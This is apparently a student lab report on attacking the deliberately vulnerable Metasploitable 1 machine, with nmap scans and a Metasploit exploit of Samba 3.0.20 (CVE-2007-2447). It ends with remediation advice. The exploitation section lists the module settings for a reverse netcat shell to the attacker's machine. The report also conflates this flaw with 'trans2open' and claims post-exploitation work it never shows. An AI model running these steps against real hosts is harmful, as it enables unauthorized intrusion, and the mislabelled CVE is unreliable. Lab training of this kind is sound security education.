Project Report: Exploitation

of Metasploitable 1

Student Name: ImoleAyo

Course: Cyber Security

Instructor: Adisa Toheeb

Kayode
 EXECUTIVE SUMMARY
Metasploitable 1 is a deliberately vulnerable Linux machine designed for testing and practicing

penetration testing techniques. This project aims to exploit its vulnerabilities, analyze the security

flaws, and provide insights into the exploitation process.

Objectives

 Identify vulnerabilities in the Metasploitable 1 server.

 Perform exploitation using penetration testing tools.

 Document the exploitation process and suggest potential mitigation strategies.

Tools and Environment

 Virtualization Platform: VMware Workstation

 Target Machine: Metasploitable 1

 Operating System: Linux-based (Ubuntu 8.04)

 Tools Used:

o Nmap

o Metasploit Framework
 Penetration Testing Report

Lab Installation

As part of this project, I targeted Metasploitable 1, a deliberately vulnerable Linux-based

virtual machine designed for penetration testing practice. The Metasploitable 1 image was

downloaded from an online source and extracted to the Documents folder on my system.

Once extracted, I imported and launched the virtual machine using VMware Workstation.

During the initial boot, I successfully logged in using the default credentials provided by the

system:

 Username: msfadmin

 Password: msfadmin

A screenshot confirming successful login is included below

After successfully logging into the Metasploitable 1 virtual machine, I executed the ifconfig

command to identify its IP address. The output revealed that the target system was assigned

the IP address 192.168.84.136.

An IP address serves as a unique identifier for a device on a network, allowing it to

communicate with other systems.

With the target system identified, I proceeded to perform a comprehensive penetration test

using the five standard phases of the hacking methodology, which include:

1. Information Gathering: Collecting preliminary data about the target system and

environment.

2. Scanning and Enumeration: Identifying open ports, services, and system details to

uncover potential vulnerabilities.

3. Exploitation: Actively leveraging discovered vulnerabilities to gain unauthorized

access.

4. Post-Exploitation:Exploring the compromised system for sensitive information,

privilege escalation, and maintaining access.

 5. Documentation and Reporting: Compiling all findings, steps taken, and remediation

recommendations into a structured report.

First Step: Information Gathering:

In this phase of the penetration test, I focused on Information Gathering, which is often

considered the most critical stage of the process—accounting for approximately 70% of the

overall penetration effort. This stage involves collecting as much data as possible about the

target system to lay the groundwork for subsequent attacks.

Having already identified the IP address of the Metasploitable 1 target as 192.168.84.136, I

proceeded to verify that the system was active and reachable on the network. To do this, I

issued a ping request from my attacking machine:

The target responded successfully, confirming that it was live and connected to the

networkmaking it ready for further reconnaissance and scanning.

After confirming that the target machine at 192.168.84.136 was online, I proceeded to the

Scanning and Enumeration phase of the penetration test. This stage involves identifying

open ports and collecting detailed information about the services running on the target

system.

Using Nmap (Network Mapper)—a powerful open-source network scanning tool—I

discovered that several ports were open, including:

 Port 21 – FTP (File Transfer Protocol)

 Port 22 – SSH (Secure Shell)

 Port 23 – Telnet

 Port 25 – SMTP (Simple Mail Transfer Protocol)

Stage 2: Scanning and Enumeration

To begin enumerating these services one by one, I started with port 21 (FTP). I ran the

following Nmap command:

Explanation of the Command and Switches:

 nmap: The main command used to invoke the Nmap tool.

 -sC: This switch tells Nmap to use the default scripts from the Nmap Scripting

Engine (NSE). These scripts perform tasks like banner grabbing, checking for

anonymous FTP access, and gathering general information.

 -sV: Enables version detection, allowing Nmap to probe services to determine their

software version (e.g., vsftpd 2.3.4).

 192.168.84.136: The IP address of the target machine.

 -p 21: Specifies that the scan should be limited to port 21, which is typically used by

FTP services.
Following the FTP enumeration, I continued the Scanning and Enumeration phase by

targeting port 445, which is commonly used for SMB (Server Message Block) protocol. To

do this, I ran a specific Nmap scan against the SMB port on the target machine:

Scan Results Summary:

From the output of the scan, I was able to gather valuable information about the SMB service

running on the target:

 Computer Name: metasploitable

 Domain Name: localdomain

 Service: SMB

 Version: Unix Samba 3.0.20-Debian

This information confirmed that the target was running an outdated and potentially vulnerable

version of Samba—specifically version 3.0.20.

Next Step – Vulnerability Research:

With the version details obtained, I proceeded to search for known exploits associated with

Samba 3.0.20-Debian. This version is known to be affected by several vulnerabilities,

including the well-documented remote code execution exploit commonly referred to as

"Samba trans2open" or CVE-2007-2447.

This vulnerability allows an unauthenticated attacker to execute arbitrary code on the target

system by sending a specially crafted request to the SMB service.

STEP 3 EXPLOITATION:

The Samba service running on the target machine (version 3.0.20-Debian) was identified as

vulnerable to a command injection flaw through the username parameter. This vulnerability

is known as CVE-2007-2447, and Metasploit provides a dedicated module to exploit it. To

begin the exploitation process, I launched the Metasploit Framework by executing

msfconsole. I then searched for available Samba-related modules using the command search

samba, and identified the appropriate exploit module: exploit/multi/samba/usermap_script. I

loaded this module using the command use exploit/multi/samba/usermap_script, and

configured the target IP address using set RHOST 192.168.84.136. For the payload, I selected

a reverse shell by setting set payload cmd/unix/reverse_netcat. To enable communication

between the target and my attacking machine, I configured the local host using the IP address

associated with my eth0 interface, via the command set LHOST <your_eth0_ip>, and chose

port 4444 by running set LPORT 4444. Once all parameters were correctly configured, I

initiated the exploit using the run command.

Recommendations

Based on the vulnerabilities discovered and successfully exploited during this penetration

test, the following security recommendations are proposed to mitigate the identified risks:

1. Update and Patch Outdated Services

o Immediately update vulnerable services such as Samba 3.0.20,which are

known to contain remote code execution backdoors.

o Regularly apply system and software patches to close known vulnerabilities.

2. Restrict Unnecessary Services

o Disable or remove services that are not actively used (e.g., Telnet, FTP),

especially if they transmit data unencrypted or are inherently insecure.

3. Enforce Strong Access Controls

o Implement firewall rules to restrict access to critical services like SMB, SSH,

and FTP to only trusted IP addresses.

 o Use strong, unique passwords for all accounts, and disable default

credentials (e.g., msfadmin).

4. Implement Network Segmentation

o Isolate sensitive systems from the general network to limit the blast radius in

case of compromise.

5. Enable Logging and Intrusion Detection

o Enable detailed logging for all authentication and network activities.

o Deploy host-based and network-based intrusion detection/prevention systems

(IDS/IPS).

6. Use Encrypted Protocols

o Replace insecure protocols like FTP and Telnet with secure alternatives such

as SFTP and SSH.

7. Conduct Regular Security Audits

o Perform regular vulnerability scans and penetration testing to proactively

identify and fix weaknesses before attackers exploit them.

Conclusion

This penetration test against the Metasploitable 1 virtual machine successfully demonstrated

the practical exploitation of multiple well-known vulnerabilities. By following the five

phases of the hacking methodology, I was able to:

 Discover the target’s IP address using basic network tools.

 Enumerate active services and identify high-risk vulnerabilities using Nmap.

  Exploit weaknesses in Samba 3.0.20 to gain remote shell access to the system.

 Conduct post-exploitation tasks such as user enumeration and privilege identification.

The findings highlight the critical importance of maintaining up-to-date systems, disabling

insecure services, and applying security best practices. While Metasploitable is an

intentionally vulnerable system used for training purposes, the same vulnerabilities exist in

real-world environments where they pose serious security risks if left unaddressed.